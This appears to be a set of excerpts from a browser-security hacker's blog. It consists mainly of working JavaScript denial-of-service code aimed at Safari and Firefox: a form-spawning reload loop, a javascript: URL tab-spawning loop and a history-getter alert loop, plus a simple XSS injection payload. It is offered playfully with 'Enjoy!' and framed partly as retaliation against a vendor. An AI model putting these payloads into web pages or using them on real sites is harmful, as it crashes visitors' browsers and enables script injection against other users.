This causes DOS in the latest Safari and maybe other browsers too. I tried it in Opera and it does create loads of tabs but seems stable enough to close it down. Enjoy!
<script type="text/javascript">
window.onload = function() {
setInterval(’spawn()’,1);
}
function spawn() {
frm = document.createElement(’form’);
frm.target = ‘x’ + Math.round(Math.random() * 100000);
frm.method = ‘GET’;
frm.action = ‘?’;
document.body.appendChild(frm);
frm.submit();
self.location.reload();
}
</script>
Hello my student here I’ll show you the way of the tiger, if a deadly Firefox ninja approaches your dojo with a XSS punch:-
"><script>alert(/XSS PUNCH!/)</script>
Then you can respond with the crouching tab hidden dos move:-
self.location = "javascript:window.open(’javascript:document.clear();
document.open();document.close();self.location=self.location’)";
This move can frustrate your opponent into submission.
Well what do you do when you report a bug to Apple and the deny it is even a problem?
Turn it into a remote one.
What do you do when they don’t provide you with any credit whatsoever? Give up? Stop testing Safari? Or drink lots of coffee and red bull, stay up all night hacking [...]
Here’s a complete DOS attack on Firefox using the history object:-
window.onload = function() {
history.__defineGetter__("x", function() {
for(i in this) {
try {
alert(this[i]);
} catch(e) {
}
}
});
history.x;
}
Tested on Firefox 2.0.0.9 mac, a window pops up [...]
I’ve been hacking Firefox in my spare time and I thought that it had adequate protection against spoofing properties like document.domain. I was wrong This could turn into a browser exploit in future if the spoofed objects are accepted by Firefox internally (I don’t think they are, but you never know ).
There are [...]